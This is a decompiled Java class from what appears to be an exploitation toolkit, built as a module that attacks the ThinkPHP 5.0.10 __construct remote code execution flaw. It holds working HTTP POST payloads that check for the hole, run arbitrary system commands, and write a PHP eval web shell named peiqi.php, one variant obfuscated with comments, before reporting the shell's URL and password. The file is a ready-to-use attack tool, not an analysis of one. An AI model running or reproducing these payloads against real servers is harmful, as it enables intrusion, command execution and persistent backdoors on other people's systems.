package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import java.util.ArrayList;
import java.util.Iterator;
import util.BasePayload;
import util.Module;
import util.Result;

/* loaded from: input_file:exploit/tp5010.class */
public class tp5010 implements BasePayload {
    @Override // util.BasePayload
    public Result checkVUL(String str) {
        String str2 = str + "/?s=" + new Module().getModule(str);
        Iterator<String> it = new ArrayList<String>() { // from class: exploit.tp5010.1
            {
                add("_method=__construct&method=get&filter[]=phpinfo&get[]=-1");
                add("s=-1&_method=__construct&method=get&filter[]=phpinfo");
            }
        }.iterator();
        while (it.hasNext()) {
            String next = it.next();
            try {
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (HttpRequest.post(str2).send(next).body().contains("PHP Version")) {
                return new Result(true, "ThinkPHP 5.0.10 construct RCE", str2 + " Post: " + next);
            }
            continue;
        }
        return new Result(false, "ThinkPHP 5.0.10 construct RCE", "");
    }

    @Override // util.BasePayload
    public Result exeVUL(String str, String str2) throws Exception {
        try {
            String body = HttpRequest.post(str + "/?s=" + new Module().getModule(str)).send("s=" + str2 + "&_method=__construct&method&filter[]=system").body();
            String substring = body.substring(0, body.indexOf("<"));
            return substring.equals("") ? new Result(true, "", body) : new Result(true, "", substring);
        } catch (Exception e) {
            e.printStackTrace();
            return new Result(false, null, null);
        }
    }

    @Override // util.BasePayload
    public Result getShell(String str) throws Exception {
        String str2 = str + "/?s=" + new Module().getModule(str);
        Iterator<String> it = new ArrayList<String>() { // from class: exploit.tp5010.2
            {
                add("_method=__construct&filter[]=system&mytest=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
                add("_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
                add("_method=__construct&method=get&filter[]=assert&get[]=/*1111*//***/file_put_contents/*1**/(/***/'./peiqi.php',/***/'<?php%20@eval($_POST[%27peiqi%27])?>'/***/);');");
                add("s=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');&_method=__construct&method=&filter[]=assert");
                add("_method=__construct&method=get&filter[]=assert&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
            }
        }.iterator();
        while (it.hasNext()) {
            try {
                HttpRequest.post(str2).send(it.next()).body();
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (HttpRequest.get(str + "/peiqi.php").code() == 200) {
                return new Result(true, "", str + "/peiqi.php   Pass:peiqi");
            }
            continue;
        }
        return new Result(false, null, null);
    }
}
